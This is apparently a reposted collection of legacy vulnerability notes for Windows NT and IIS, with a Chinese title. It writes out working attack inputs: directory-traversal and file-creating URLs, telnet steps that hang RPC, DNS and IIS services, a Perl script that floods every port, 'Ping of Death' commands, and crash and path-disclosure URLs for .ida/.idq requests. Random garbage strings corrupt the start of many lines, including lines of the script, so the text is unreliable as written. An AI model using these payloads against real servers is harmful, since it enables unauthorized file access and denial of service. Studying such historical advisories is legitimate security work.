NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
8 v6 A- W+ m$ z  uA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
' o+ o1 d3 O: ?- v) c
; X, C) k5 E7 o9 u4 X3 {2 H' cA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

# j: n3 y8 z% D( B3 MBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

受影響系統(tǒng):4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
; d( f- o0 }" |; a
: B/ k$ I- w: yIf the file 'target.bat' exists, the file will be truncated.
& ?6 S! h4 e9 n1 f+ L
/ B) x3 \, ?6 j  n# p8 k
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

2 w) N% O, o5 c/ ~9 @  j9 e----------------------------------------------------------------------
- R- S7 k6 d# T5 v( m
6 U' V; N  _* `: N# Q& Z5 G: K. _. w% `受影響系統(tǒng):3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
' ?9 E/ H: R. @& o- A- a7 ]
The following steps;

$ [+ |) \2 d- J: y. x. |5 }Telnet to an NT 4.0 system on port 135
' _& i4 }. R3 [- @: wType about 10 characters followed by a <CR>
6 a7 G/ {' i  n7 e2 a3 L! c" tExit Telnet
* H" t+ E$ t% _6 ?results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

3 n) J1 }* L; U: v1 aWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
! ~/ C, s( U7 D6 V, z. X* L
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
0 g. g; W8 S+ r5 a' Q
( J2 n1 q( W6 S. {If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

  p5 \. P2 c* k" |The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
3 ?- z7 ?: G, _+ A" j' f
& J8 O; j7 X. `# }/*begin poke code*/

) z' q; N8 c& Y' `* g. Wuse Socket;
use FileHandle;
, `2 M3 h0 Q. l8 irequire "chat2.pl";

$systemname = $ARGV[0] && shift;

$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
: d$ x- y  Y+ ~. n, q. l+ V{
1 f3 g, t  t- d3 V# i
9 y4 O1 E, g' o7 h) H& a$ N
1 i" k- t+ H) ]. a! u8 wif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
& N% \! _9 \$ M4 U  O( @/ c" k}
$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
5 o' X+ V8 n, a0 I4 r/ z; r' ^if ($verbose) {
print "Trying port: $port\n";
$ @% m2 G+ p# N3 y. N8 Y}
; a. K$ u# S* Q- y  Q. m! o6 v3 bchat::close($fh);
* i1 H* e6 C! ~. u6 l. i
}
8 t1 j6 \# ~1 j# I+ `) R. l
- B3 o3 H7 e: g5 a
/*end poke code*/

! n; `; f5 ^/ {* m# f: s. V% rSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

: E8 g+ t0 K/ E& J; v) O, J  B受影響系統(tǒng):4.0
- x$ }3 j1 I+ Y3 o5 B* yUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

) s, H3 U, S/ Z! \: f: E( qThis attack causes Dr. Watson to display an alert window and to log an error:

6 s( W# s% `: H2 N+ m0 L"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
/ d" e( F3 U* `! D$ d
--------------------------------------------------------------------------------

6 F1 r' r: Z4 S% A- M( I受影響系統(tǒng):3.51,4.0
5 c0 Y& F# B. k- `3 iLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
0 e0 C; ?8 U; w7 M2 r
STOP: 0X0000001E
6 C; `" ~1 p4 ^6 [. y' HKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

) g0 i3 Y1 i5 t- Y: ?-OR-
& `) {3 ~' k& I+ c" T
( Y1 o4 L. s9 e% i# T; b( E* ^& USTOP: 0x0000000A
! f, }' W5 f. Y& DIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------
& E* W; [$ ]3 U$ R
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

4 n5 c' ]. p  o6 J& w3 }--------------------------------------------------------
, _' [) Q& j  r
* d9 X7 u) t, U0 t. F% qIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server